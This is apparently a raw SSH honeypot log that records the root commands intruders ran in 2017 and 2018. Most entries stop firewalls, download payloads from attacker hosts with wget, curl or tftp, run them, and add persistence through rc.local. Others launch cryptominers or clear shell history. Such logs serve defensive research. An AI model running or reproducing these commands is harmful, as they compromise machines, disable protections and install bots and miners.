wget http://www.asdq.cf:67/wget.sh
chmod 777 wget.sj
./wget.sh
cd /etc curl -o curl.sh http://www.asdq.cf:67/curl.sh chmod 777
curl -o curl.sh http://www.asdq.cf:67/curl.sh
wget
wget -o wget.sh http://www.asdq.cf:67/wget.sh
cd
mv .bash_history2 .bash_history
vi .bash_history

From 182.23.66.230  5-Apr-2018 05:40:27 ssh2 root
Exec uname -a && lscpu 
uname -a && lscpu
Exec uname -a && lscpu 
uname -a && lscpu
Exec uname -a && lscpu 
uname -a && lscpu

From 182.23.66.230  9-Apr-2018 02:49:09 ssh2 root
Exec uname -a && lscpu 
uname -a && lscpu
Exec uname -a && lscpu 
uname -a && lscpu

From 60.250.99.131  9-Apr-2018 23:31:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.250.99.131:9998/services;chmod 777 services;./services;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://60.250.99.131:9998/services
chmod 777 services
./services

From 140.143.35.89 15-Apr-2018 08:24:21 ssh2 root
Exec cd /etc;rm -f shz.sh;chattr -i /usr/bin/wget;chmod 777 /usr/bin/wget;wget http://140.143.35.89:43768/shz.sh;get http://140.143.35.89:43768/shz.sh;nohup sh shz.sh &
cd /etc
rm -f shz.sh
chattr -i /usr/bin/wget
chmod 777 /usr/bin/wget
wget http://140.143.35.89:43768/shz.sh
get http://140.143.35.89:43768/shz.sh
nohup sh shz.sh &

From 113.65.25.46 16-Apr-2018 21:06:33 ssh2 root
yum -y install wget wget -N --no-check-certificate https://softs.fun/Bash/ssr.sh
yum -y install wget
wget -N --no-check-certificate https://softs.fun/Bash/ssr.sh && chmod +x ssr.sh

From 111.67.194.29  6-May-2018 02:37:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.194.29:32322/Manager;chmod 777 Manager;./Manager;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.194.29:32322/Manager
chmod 777 Manager
./Manager

From 182.186.197.168  6-May-2018 22:09:25 ssh2 root
free -m
ls
ls -lia
uname -a
exit

From 182.186.197.168 14-May-2018 10:52:53 ssh2 root
ls
free -m
exit

From 218.29.241.22  6-Jun-2018 10:49:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.46.37/xudp;chmod 777 xudp;./xudp;echo "cd /tmp/">>/etc/rc.local;echo "./xudp&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://111.73.46.37/xudp
chmod 777 xudp
./xudp
echo "cd /tmp/">>/etc/rc.local
echo "./xudp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 46.36.41.150 27-Jun-2018 14:48:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.36.39.40/hackers.sh; chmod 777 hackers.sh; sh hackers.sh; tftp 46.36.39.40 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.36.39.40; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.36.39.40 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf hackers.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://46.36.39.40/hackers.sh
chmod 777 hackers.sh
sh hackers.sh
tftp 46.36.39.40 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 46.36.39.40
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh ftp1.sh
rm -rf hackers.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 39.118.214.171  3-Aug-2018 15:46:29 ssh2 root
Exec echo 646
echo 646

From 115.126.100.81 10-Aug-2018 10:45:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://115.126.100.81:9960/chongfu.sh;chmod 777 chongfu.sh;./chongfu.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://115.126.100.81:9960/chongfu.sh
chmod 777 chongfu.sh
./chongfu.sh

From 84.2.106.82 19-Aug-2018 12:05:55 ssh2 root
Exec /bin/sh -c "echo hi"
/bin/sh -c "echo hi"

From 212.237.2.20 25-Aug-2018 15:17:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.83.93/haknit.sh; curl -O http://80.211.83.93/haknit.sh; chmod 777 haknit.sh; sh haknit.sh; tftp 80.211.83.93 -c get thaknit.sh; chmod 777 thaknit.sh; sh thaknit.sh; tftp -r thaknit2.sh -g 80.211.83.93; chmod 777 thaknit2.sh; sh thaknit2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.211.83.93 haknit1.sh haknit1.sh; sh haknit1.sh; rm -rf haknit.sh thaknit.sh thaknit2.sh haknit1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://80.211.83.93/haknit.sh
curl -O http://80.211.83.93/haknit.sh
chmod 777 haknit.sh
sh haknit.sh
tftp 80.211.83.93 -c get thaknit.sh
chmod 777 thaknit.sh
sh thaknit.sh
tftp -r thaknit2.sh -g 80.211.83.93
chmod 777 thaknit2.sh
sh thaknit2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh haknit1.sh
rm -rf haknit.sh thaknit.sh thaknit2.sh haknit1.sh
rm -rf *

From 117.200.76.7 29-Aug-2018 20:29:07 ssh2 root
Exec echo -ne 'aaa' || echo -ne 'bbb'
echo -ne 'aaa' || echo -ne 'bbb'

From 117.200.76.7 30-Aug-2018 06:50:05 ssh2 root
Exec ping 999.999.999.999
ping 999.999.999.999

From 117.200.76.7 30-Aug-2018 17:11:03 ssh2 root
Exec free -m
free -m

From 117.200.76.7 31-Aug-2018 03:32:01 ssh2 root
Exec /bin/busybox wget
/bin/busybox wget

From 117.200.76.7 31-Aug-2018 13:52:59 ssh2 root
Exec nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x &

nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner

From 117.200.76.7  1-Sep-2018 00:13:57 ssh2 root
Exec nohup ./upcheck.sh || bash ./upcheck.sh &

nohup ./upcheck.sh || bash ./upcheck.sh &

From 183.93.123.134 15-Sep-2018 11:17:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://222.186.139.216:9960/chongfu.sh;chmod 777 chongfu.sh;./chongfu.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://222.186.139.216:9960/chongfu.sh
chmod 777 chongfu.sh
./chongfu.sh

From 116.31.99.114 18-Sep-2018 08:53:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.138.8:3333/sssiu;chmod 777 sssiu;./sssiu;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.138.8:3333/sssiu
chmod 777 sssiu
./sssiu

From 51.255.172.246 23-Sep-2018 10:54:32 ssh2 root
Exec cat /etc/issue ; lscpu ; free -g
cat /etc/issue
lscpu
free -g

From 145.239.187.193 26-Sep-2018 07:15:58 ssh2 root
Exec uname -n -s -v -r
uname -n -s -v -r

From 213.147.165.148 3-Oct-2018 00:28:50 ssh2 root
w
uname -a
uname -a -a -a -a -a -a -a
last
cat /proc/cpuinfo
cd /var/tmp
wget
wget futem.pe.hu7caratier.tgz
wget futem.pe.hu/cartier.tgz
wget http://futem.pe.hu/cartier.tgz
cd
id
ls -a
ps -x

From 58.218.66.91 9-Oct-2018 15:11:46 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.223:222/8888;chmod 777 8888;./8888;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.223:222/8888
chmod 777 8888
./8888

From 220.170.45.104 12-Oct-2018 13:41:46 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.71.226:1111/xiyang;chmod 777 xiyang;./xiyang;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.71.226:1111/xiyang
chmod 777 xiyang
./xiyang

From 185.244.25.105 13-Oct-2018 20:18:25 ssh2 root
Exec cd /tmp; rm -rf /tmp/mezy;  wget http://185.141.61.17/css/bg.css -O /tmp/mezy; chmod 777 /tmp/mezy; sh /tmp/mezy; rm -rf /tmp/mezy/
cd /tmp
rm -rf /tmp/mezy
wget http://185.141.61.17/css/bg.css -O /tmp/mezy
chmod 777 /tmp/mezy
sh /tmp/mezy
rm -rf /tmp/mezy/

From 58.218.56.102 15-Oct-2018 22:50:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://118.184.50.24:7772/ppol;chmod 777 ppol;./ppol;chattr +i /tmp/ppol;echo "cd /tmp/">>/etc/rc.local;echo "./ppol&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://118.184.50.24:7772/ppol
chmod 777 ppol
./ppol
chattr +i /tmp/ppol
echo "cd /tmp/">>/etc/rc.local
echo "./ppol&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 58.218.205.241 24-Oct-2018 02:17:00 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://58.218.205.241:5/Warry;chmod 777 Warry;./Warry;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://58.218.205.241:5/Warry
chmod 777 Warry
./Warry

From 109.230.199.157 18-Nov-2018 07:42:27 ssh2 root
ls
id
cat /etc/issue
cat /etc/release
cat /etc/version
ifconfig
apt
yum
ls
cd
ls -a
cat test.pl
ls
ls -a
ifconfig
php -V
ls
cat rest1.pl
cat ipcalc.pl
cat *
ls
cd .ssh
ls

From 62.176.21.131 29-Nov-2018 02:45:20 ssh2 root
Exec cat /proc/cpuinfo
cat /proc/cpuinfo

From 109.166.132.127 16-Dec-2018 09:52:25 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export
export HISTSIZE=0
export HISTFILESIZE=0
whereis sendmail

File: fakesshd-log-2017.txt


From 111.73.45.188  2-Jan-2017 05:33:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/pzz;chmod 777 pzz;./pzz;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.188:9876/pzz
chmod 777 pzz
./pzz

From 42.59.189.121  4-Jan-2017 15:47:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.192.105:3333/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.192.105:3333/ssssyn
chmod 777 ssssyn
./ssssyn

From 94.97.86.201 11-Jan-2017 17:15:07 ssh2 root
Exec unset plm; plm=`ps x |grep stratum|grep -v grep| cut -d 's' -f 2`; if [ -e $plm ] ; then mkdir /var/tmp/.war;wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1;curl -o /var/tmp/.war/1 http://95.128.182.166/javascripts/minerd;chmod +x /var/tmp/.war/1 ; (exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &);wget http://95.128.182.166/javascripts/4 -O /var/tmp/.war/4;curl -o /var/tmp/.war/4 http://95.128.182.166/javascripts/4;chmod +x /var/tmp/.war/4; cp /var/tmp/.war/4 /var/tmp/.war/6;(exec /var/tmp/.war/4 &> /dev/null &) ; (while [ 1 ]; do killall 4; killall 5 ; cp /var/tmp/.war/6 /var/tmp/.war/5;chmod +x /var/tmp/.war/5;(exec /var/tmp/.war/5 &> /dev/null &); sleep 3600 ;done &) ; else echo; fi;
unset plm
plm=`ps x |grep stratum|grep -v grep| cut -d
if [ -e $plm ]
then mkdir /var/tmp/.war
wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1
curl -o /var/tmp/.war/1 http://95.128.182.166/javascripts/minerd
chmod +x /var/tmp/.war/1
(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com
wget http://95.128.182.166/javascripts/4 -O /var/tmp/.war/4
curl -o /var/tmp/.war/4 http://95.128.182.166/javascripts/4
chmod +x /var/tmp/.war/4
cp /var/tmp/.war/4 /var/tmp/.war/6
(exec /var/tmp/.war/4 &> /dev/null &)
(while [ 1 ]
do killall 4
killall 5
cp /var/tmp/.war/6 /var/tmp/.war/5
chmod +x /var/tmp/.war/5
(exec /var/tmp/.war/5 &> /dev/null &)
sleep 3600
done &)
else echo
fi

From 222.186.58.182 17-Jan-2017 07:47:41 ssh2 root
Exec wget -O /tmp/hdvr http://118.184.48.90:7361/hdvr
wget -O /tmp/hdvr http://118.184.48.90:7361/hdvr

From 118.193.228.226 21-Jan-2017 15:17:21 ssh2 root
uname -a

From 221.194.44.219 25-Jan-2017 02:05:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.219:7791/poiu;chmod 777 poiu;./poiu;echo "cd /tmp/">>/etc/rc.local;echo "./poiu&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.219:7791/poiu
chmod 777 poiu
./poiu
echo "cd /tmp/">>/etc/rc.local
echo "./poiu&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 123.249.35.42 25-Jan-2017 22:47:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://123.249.35.42:11122/Sym50.ssz;chmod 777 Sym50.ssz;./Sym50.ssz;echo "cd /tmp/">>/etc/rc.local;echo "./Sym50.ssz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://123.249.35.42:11122/Sym50.ssz
chmod 777 Sym50.ssz
./Sym50.ssz
echo "cd /tmp/">>/etc/rc.local
echo "./Sym50.ssz&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.117.236.148 29-Jan-2017 21:28:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:3322/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73:3322/ssssyn
chmod 777 ssssyn
./ssssyn

From 117.179.164.9  1-Feb-2017 10:01:31 ssh2 root
uname -a
whoami

From 103.79.141.29  1-Feb-2017 20:22:29 ssh2 root
uname -a
service iptables stop
wget http://115.159.5.86:6606/google
wget -O http://115.159.5.86:6606/google
wget -c
exit

From 211.97.129.228  7-Feb-2017 00:34:05 ssh2 root
uname -a
ps -ef
rm -rf /etc/crontab find ./ -name "S90*" |
passwd

From 211.97.131.161  7-Feb-2017 21:16:01 ssh2 root
uname -a
ps -ef
rm -rf /etc/crontab find ./ -name "S90*" |
passwd
dfkdsjgldfkgdkgkshgshgwwwxxxaqqq

From 123.188.129.80  8-Feb-2017 01:16:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.26.78.88:8080/SYN250;chmod 777 SYN250;./SYN250;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.26.78.88:8080/SYN250
chmod 777 SYN250
./SYN250

From 211.97.131.225 10-Feb-2017 21:42:47 ssh2 root
passwd
ps -ef

From 211.97.131.225 11-Feb-2017 08:03:45 ssh2 root
uname -
uname -a
ps -ef
passwd

From 125.211.202.186 12-Feb-2017 15:06:39 ssh2 root
Exec /tmp/ss.exe upgrade
/tmp/ss.exe upgrade

From 42.87.19.244 12-Feb-2017 22:29:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:8787/SYN25000;chmod 777 SYN25000;./SYN25000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://www.ksddos.com:8787/SYN25000
chmod 777 SYN25000
./SYN25000

From 125.211.202.186 13-Feb-2017 11:48:35 ssh2 root
Exec chmod 0777 /tmp/ss.exe
chmod 0777 /tmp/ss.exe

From 125.211.202.186 13-Feb-2017 22:09:33 ssh2 root
Exec /tmp/ss.exe
/tmp/ss.exe

From 125.211.202.186 14-Feb-2017 08:30:31 ssh2 root
Exec rm -rf /tmp/ss.exe*
rm -rf /tmp/ss.exe*

From 125.211.202.186 15-Feb-2017 05:12:27 ssh2 root
Exec chmod 0777 /tmp/t0.5
chmod 0777 /tmp/t0.5

From 125.211.202.186 16-Feb-2017 22:36:19 ssh2 root
Exec chmod 0777	 /tmp/t0.5
chmod 0777 /tmp/t0.5

From 1.85.118.181 17-Feb-2017 00:11:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/8uc;chmod 777 8uc;./8uc;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://www.ksddos.com:7777/8uc
chmod 777 8uc
./8uc

From 125.211.202.186 17-Feb-2017 08:57:17 ssh2 root
Exec /tmp/t0.5
/tmp/t0.5

From 1.85.118.181 17-Feb-2017 09:57:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://43.240.0.118:521/max64;chmod 777 max64;./max64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://43.240.0.118:521/max64
chmod 777 max64
./max64

From 1.85.118.181 17-Feb-2017 14:50:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/syn777;chmod 777 syn777;./syn777;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://www.ksddos.com:7777/syn777
chmod 777 syn777
./syn777

From 125.211.202.186 17-Feb-2017 19:18:15 ssh2 root
Exec rm -rf /tmp/t0.5
rm -rf /tmp/t0.5

From 1.85.118.181 17-Feb-2017 19:43:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/syn789;chmod 777 syn789;./syn789;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://www.ksddos.com:7777/syn789
chmod 777 syn789
./syn789

From 1.85.118.181 18-Feb-2017 00:36:21 ssh2 root
Exec wget http://103.26.78.88:8080/syn789;chmod 777 syn789;./syn789
wget http://103.26.78.88:8080/syn789
chmod 777 syn789
./syn789

From 104.236.224.5 18-Feb-2017 20:08:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.236.224.5/8UsA.sh; curl -O http://104.236.224.5/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 104.236.224.5 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 104.236.224.5; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.236.224.5 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://104.236.224.5/8UsA.sh
curl -O http://104.236.224.5/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 104.236.224.5 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 104.236.224.5
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 211.97.131.202 21-Feb-2017 06:05:59 ssh2 root
uname -a
ps -ef
passwd

From 211.97.128.214 22-Feb-2017 13:08:53 ssh2 root
uname -a
ps -ef

From 42.57.144.208 23-Feb-2017 02:43:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:22334/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73:22334/ssssyn
chmod 777 ssssyn
./ssssyn

From 119.117.238.37 23-Feb-2017 17:22:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73/Linux-syn25;chmod 777 Linux-syn25;./Linux-syn25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73/Linux-syn25
chmod 777 Linux-syn25
./Linux-syn25

From 119.249.54.93  1-Mar-2017 10:44:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.219:7791/poiu;chmod 777 poiu;./poiu;chattr +i /tmp/poiu;echo "cd /tmp/">>/etc/rc.local;echo "./poiu&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.219:7791/poiu
chmod 777 poiu
./poiu
chattr +i /tmp/poiu
echo "cd /tmp/">>/etc/rc.local
echo "./poiu&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 111.73.45.39  1-Mar-2017 21:05:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.39:9876/paa;chmod 777 paa;./paa;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.39:9876/paa
chmod 777 paa
./paa

From 42.177.174.108  7-Mar-2017 17:33:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:22334/Linux-syn25;chmod 777 Linux-syn25;./Linux-syn25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73:22334/Linux-syn25
chmod 777 Linux-syn25
./Linux-syn25

From 111.73.46.27 13-Mar-2017 12:31:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.39:8896/pqq;chmod 777 pqq;./pqq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.39:8896/pqq
chmod 777 pqq
./pqq

From 125.211.202.186 26-Mar-2017 12:00:25 ssh2 root
Exec chmod 0777 /tmp/s2
chmod 0777 /tmp/s2

From 125.211.202.186 26-Mar-2017 22:21:23 ssh2 root
Exec /tmp/s2 upgrade
/tmp/s2 upgrade

From 125.211.202.186 27-Mar-2017 08:42:21 ssh2 root
Exec rm -rf /tmp/s2
rm -rf /tmp/s2

From 125.211.202.186 27-Mar-2017 19:03:19 ssh2 root
Exec scp -t -- /tmp/
scp -t -- /tmp/

From 125.211.202.186 28-Mar-2017 05:24:17 ssh2 root
Exec chmod 0777 /tmp/x0.7
chmod 0777 /tmp/x0.7

From 125.211.202.186 28-Mar-2017 15:45:15 ssh2 root
Exec /tmp/x0.7
/tmp/x0.7

From 125.211.202.186 29-Mar-2017 02:06:13 ssh2 root
Exec rm -rf /tmp/x0.7
rm -rf /tmp/x0.7

From 112.4.175.80 31-Mar-2017 05:51:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.214.171.198:5198/zsyy;chmod 777 zsyy;./zsyy;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.214.171.198:5198/zsyy
chmod 777 zsyy
./zsyy

From 45.125.17.19 13-Apr-2017 04:20:03 ssh2 root
ps -ef
w
top

From 104.238.127.81 12-May-2017 12:05:47 ssh2 root
Exec curl -fsSL http://218.248.40.228:8443/i.sh | sh
curl -fsSL http://218.248.40.228:8443/i.sh | sh

From 141.105.66.143 18-May-2017 23:20:17 ssh2 root
Exec uname
uname

From 45.76.145.216 21-May-2017 03:05:07 ssh2 root
Exec cat /proc/cpuinfo| grep 'cpu cores'| uniq | awk '{print $4}'
cat /proc/cpuinfo| grep 'cpu cores'| uniq | awk

From 173.236.29.90 30-May-2017 04:25:25 ssh2 root
Exec cd /tmp; ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9;ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9; ulimit -n 150000; wget -O sfs http://185.174.172.18/sfs;chmod 777 sfs;./sfs -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u richard.melony@openmailbox.org -p x >/dev/null 2>&1 &; ps -ef | grep rrr | grep -v grep | awk '{print $2}' | xargs kill -9;ps -ef | grep rrr | grep -v grep | awk '{print $2}' | xargs kill -9
cd /tmp
ps -ef | grep sfs | grep -v
ulimit -n 150000
wget -O sfs http://185.174.172.18/sfs
chmod 777 sfs
./sfs -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u richard.melony@openmailbox.org -p
ps -ef | grep rrr | grep -v

From 159.65.184.238  9-Jul-2017 17:10:45 ssh2 root
Exec  cat /etc/issue
cat /etc/issue

From 5.39.94.66 10-Jul-2017 03:37:15 ssh2 root
Exec top -v | grep ver
top -v | grep ver

From 119.188.247.73 12-Jul-2017 18:26:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:3333/linux9.0;chmod 777 linux9.0;./linux9.0;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73:3333/linux9.0
chmod 777 linux9.0
./linux9.0

From 51.140.72.37 21-Jul-2017 19:03:21 ssh2 root
Exec uname-a
uname-a

From 94.23.90.12 22-Jul-2017 03:07:49 ssh2 root
Exec uname -n -s -r -v;wget -q xkobe.000webhostapp.com/pula;perl pula;rm -rf pula;history -c
uname -n -s -r -v
wget -q xkobe.000webhostapp.com/pula
perl pula
rm -rf pula
history -c

From 122.93.235.10 24-Jul-2017 19:30:07 ssh2 root
wget -O /tmp/javas.log http://122.93.235.10:5198/javas.log srtp -O /tmp/javas.log http://122.93.235.10:5198/javas.log
rm -f javas.log.3
rm -f javas.log.4
rm -f javas.log.5 mv /usr/bin/wget /usr/bin/srtp mv /usr/bin/curl

From 116.31.119.26 10-Aug-2017 11:09:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http:/116.31.119.26:80/httpsd;chmod 777 httpsd;./httpsd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http:/116.31.119.26:80/httpsd
chmod 777 httpsd
./httpsd

From 146.185.239.17 14-Aug-2017 04:26:19 ssh2 root
w
/sbin/ifconfig
gcc
uname -a
cat /proc/cpuinfo
exit

